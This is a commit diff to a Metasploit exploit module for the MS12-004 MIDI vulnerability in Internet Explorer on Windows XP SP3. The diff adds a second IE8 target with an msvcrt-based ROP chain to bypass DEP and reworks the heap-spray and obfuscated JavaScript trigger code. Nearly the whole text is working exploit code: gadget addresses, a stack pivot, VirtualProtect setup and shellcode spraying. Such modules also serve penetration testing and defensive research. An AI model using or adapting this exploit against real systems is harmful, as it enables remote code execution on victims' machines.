Add msvcrt ROP target for IE8

modules/exploits/windows/browser/ms12_004_midi.rb

@@ -28,10 +28,10 @@ class Metasploit3 < Msf::Exploit::Remote
 				(CImplAry) we setup, and force the browser to confuse types from tagVARIANT objects,
 				which leverages remote code execution under the context of the user.
 
-				Note: At this time, for IE 8 target, JRE (Java Runtime Environment) is required
-				to bypass DEP (Data Execution Prevention).
+				Note: At this time, for IE 8 target, you may either choose the JRE ROP, or the
+				msvcrt ROP to bypass DEP (Data Execution Prevention).
 
-				Also note: Based on our testing, the vulnerability does not seem to trigger when
+				Also, based on our testing, the vulnerability does not seem to trigger when
 				the victim machine is operated via rdesktop.
 			},
 			'License'        => MSF_LICENSE,
@@ -39,7 +39,7 @@ class Metasploit3 < Msf::Exploit::Remote
 				[
 					'Shane Garrett',  #Initial discovery (IBM X-Force)
 					'juan vazquez',
-					'sinn3r',
+					'sinn3r'
 				],
 			'References'     =>
 				[
@@ -65,30 +65,43 @@ class Metasploit3 < Msf::Exploit::Remote
 					[
 						'IE 6 on Windows XP SP3',
 						{
-							'Rop' => false,
+							'Rop' => nil,
 							'DispatchDst' => 0x0c0c0c0c
 						}
 					],
 					[
 						'IE 7 on Windows XP SP3',
 						{
-							'Rop' => false,
+							'Rop' => nil,
 							'DispatchDst' => 0x0c0c0c0c
 						}
 					],
 					[
-						'IE 8 on Windows XP SP3',
+						'IE 8 on Windows XP SP3 with JRE ROP',
 						{
 							# xchg ecx,esp
 							# or byte ptr [eax],al
 							# add byte ptr [edi+5Eh],bl
 							# ret 8
 							# From IMAGEHLP
-							'Rop' => true,
+							'Rop' => :msvcr71,
 							'StackPivot' => 0x76C9B4C2,
 							'DispatchDst' => 0x0c0c1be4
 						}
 					],
+					[
+						'IE 8 on Windows XP SP3 with msvcrt',
+						{
+							# xchg ecx,esp
+							# or byte ptr [eax],al
+							# add byte ptr [edi+5Eh],bl
+							# ret 8
+							# From IMAGEHLP
+							'Rop' => :msvcrt,
+							'StackPivot' => 0x76C9B4C2,
+							'DispatchDst' => 0x0c0c1bd0
+						}
+					]
 				],
 			'Privileged'     => false,
 			'DisclosureDate' => "Jan 10 2012",
@@ -217,7 +230,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		if datastore['OBFUSCATE']
 			trigger = ::Rex::Exploitation::JSObfu.new(trigger)
 			trigger.obfuscate
-			trigger_fn = find_trigger_fn(trigger.to_s)
+			trigger_fn = trigger.sym("trigger")
 		end
 
 		html = %Q|
@@ -261,10 +274,15 @@ class Metasploit3 < Msf::Exploit::Remote
 	def build_spray(my_target)
 
 		# Extract string based on target
-		if my_target.name == 'IE 8 on Windows XP SP3'
+		if my_target.name =~ /JRE ROP$/
 			js_extract_str = "var block = shellcode.substring(2, (0x40000-0x21)/2);"
+			js_shellcode = "var shellcode =  nops.substring(0,0x800 - code.length) + code;"
+		elsif my_target.name =~ /msvcrt$/
+			js_extract_str = "var block = shellcode.substring(0, (0x80000-6)/2);"
+			js_shellcode = "var shellcode = nops.substring(0,0x800 - code.length) + code;"
 		else
 			js_extract_str = "var block = shellcode.substring(0, (0x80000-6)/2);"
+			js_shellcode = "var shellcode =  nops.substring(0,0x800 - code.length) + code;"
 		end
 
 		# Build shellcode based on Rop requirement
@@ -290,7 +308,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 		while (nops.length < 0x1000) nops+= nops;
 
-		var shellcode =  nops.substring(0,0x800 - code.length) + code;
+		#{js_shellcode}
 
 		while (shellcode.length < 0x40000) shellcode += shellcode;
 
@@ -339,7 +357,7 @@ class Metasploit3 < Msf::Exploit::Remote
 	# 5. Force the using of the confused tagVARIANT.
 	def build_trigger(my_target)
 
-		if my_target.name == 'IE 8 on Windows XP SP3'
+		if my_target.name =~ /IE 8 on Windows XP SP3/
 
 			# Redoing the feng shui if fails makes it reliable
 			js_trigger = <<-JSTRIGGER
@@ -411,16 +429,6 @@ class Metasploit3 < Msf::Exploit::Remote
 		return trigger
 	end
 
-	def find_trigger_fn(trigger)
-		fns = trigger.scan(/function ([a-zA-Z0-9_]+)\(\)/)
-		if fns.nil? or fns.empty?
-			return "trigger"
-		else
-			return fns.last.first
-		end
-		return "trigger"
-	end
-
 	def junk(n=1)
 		tmp = []
 		value = rand_text(4).unpack("L")[0].to_i
@@ -428,42 +436,78 @@ class Metasploit3 < Msf::Exploit::Remote
 		return tmp
 	end
 
-	# ROP chain copied from ms11_050_mshtml_cobjectelement.rb (generated by mona)
-	# Added a little of roping to adjust the stack pivoting for this case
-	# Specific for IE8 XP SP3 case at this time
+	def nop
+		return make_nops(4).unpack("L")[0].to_i
+	end
+
 	def create_rop_chain(my_target)
 
-		rop_gadgets =
-		[
-			0x7c347f98,  # RETN (ROP NOP) [msvcr71.dll]
-			my_target['StackPivot'],  # stackpivot
-			junk, # padding
-			0x7c376402,  # POP EBP # RETN [msvcr71.dll]
-			0x7c376402,  # skip 4 bytes [msvcr71.dll]
-			0x7c347f97,  # POP EAX # RETN [msvcr71.dll]
-			0xfffff800,  # Value to negate, will become 0x00000201 (dwSize)
-			0x7c351e05,  # NEG EAX # RETN [msvcr71.dll]
-			0x7c354901,  # POP EBX # RETN [msvcr71.dll]
-			0xffffffff,
-			0x7c345255,  # INC EBX # FPATAN # RETN [msvcr71.dll]
-			0x7c352174,  # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN [msvcr71.dll]
-			0x7c344f87,  # POP EDX # RETN [msvcr71.dll]
-			0xffffffc0,  # Value to negate, will become 0x00000040
-			0x7c351eb1,  # NEG EDX # RETN [msvcr71.dll]
-			0x7c34d201,  # POP ECX # RETN [msvcr71.dll]
-			0x7c38b001,  # &Writable location [msvcr71.dll]
-			0x7c34b8d7,  # POP EDI # RETN [msvcr71.dll]
-			0x7c347f98,  # RETN (ROP NOP) [msvcr71.dll]
-			0x7c364802,  # POP ESI # RETN [msvcr71.dll]
-			0x7c3415a2,  # JMP [EAX] [msvcr71.dll]
-			0x7c347f97,  # POP EAX # RETN [msvcr71.dll]
-			0x7c37a151,  # ptr to &VirtualProtect() - 0x0EF [IAT msvcr71.dll]
-			0x7c378c81,  # PUSHAD # ADD AL,0EF # RETN [msvcr71.dll]
-			0x7c345c30,  # ptr to 'push esp #  ret ' [msvcr71.dll]
-		].flatten.pack('V*')
+		pivot = my_target['StackPivot']
+
+		case my_target['Rop']
+		when :msvcrt
+			rop_gadgets = 
+			[
+				0x77c539ee,  # RETN
+				pivot,
+				junk,
+				0x77c4e392,  # POP EAX # RETN
+				0x77c11120,  # <- *&VirtualProtect()
+				0x77c2e493,  # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN
+				junk,
+				0x77c2dd6c,
+				0x77c4ec00,  # POP EBP # RETN
+				0x77c35459,  # ptr to 'push esp #  ret'
+				0x77c47705,  # POP EBX # RETN
+				0x00000400,  # <- change size to mark as executable if needed (-> ebx)
+				0x77c3ea01,  # POP ECX # RETN
+				0x77c5d000,  # W pointer (lpOldProtect) (-> ecx)
+				0x77c46100,  # POP EDI # RETN 
+				0x77c46101,  # ROP NOP (-> edi)
+				0x77c4d680,  # POP EDX # RETN
+				0x00000040,  # newProtect (0x40) (-> edx)
+				0x77c4e392,  # POP EAX # RETN
+				nop,         # NOPS (-> eax)
+				0x77c12df9,  # PUSHAD # RETN
+			].flatten.pack("V*")
+
+		when :msvcr71
+			rop_gadgets =
+			[
+				0x7c347f98,  # RETN (ROP NOP)
+				pivot,       # stackpivot
+				junk,        # padding
+				0x7c376402,  # POP EBP # RETN
+				0x7c376402,  # skip 4 bytes
+				0x7c347f97,  # POP EAX # RETN
+				0xfffff800,  # Value to negate, will become 0x00000201 (dwSize)
+				0x7c351e05,  # NEG EAX # RETN
+				0x7c354901,  # POP EBX # RETN
+				0xffffffff,
+				0x7c345255,  # INC EBX # FPATAN # RETN
+				0x7c352174,  # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN
+				0x7c344f87,  # POP EDX # RETN
+				0xffffffc0,  # Value to negate, will become 0x00000040
+				0x7c351eb1,  # NEG EDX # RETN
+				0x7c34d201,  # POP ECX # RETN
+				0x7c38b001,  # &Writable location
+				0x7c34b8d7,  # POP EDI # RETN
+				0x7c347f98,  # RETN (ROP NOP)
+				0x7c364802,  # POP ESI # RETN
+				0x7c3415a2,  # JMP [EAX]
+				0x7c347f97,  # POP EAX # RETN
+				0x7c37a151,  # ptr to &VirtualProtect() - 0x0EF (IAT)
+				0x7c378c81,  # PUSHAD # ADD AL,0EF # RETN
+				0x7c345c30,  # ptr to 'push esp #  ret'
+			].flatten.pack('V*')
+		end
 
 		return rop_gadgets
 	end
 
 
 end
+
+=begin
+6367893A   FF51 04          CALL DWORD PTR DS:[ECX+4]
+=end